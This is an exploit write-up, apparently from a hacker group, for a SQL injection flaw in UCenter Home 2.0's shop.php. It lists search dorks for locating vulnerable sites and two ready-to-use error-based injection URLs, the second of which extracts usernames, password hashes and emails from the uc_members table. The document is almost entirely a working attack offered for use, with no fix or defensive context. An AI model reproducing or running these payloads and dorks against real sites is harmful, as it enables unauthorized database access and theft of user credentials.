__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability Type : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

DB : Okay.

Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1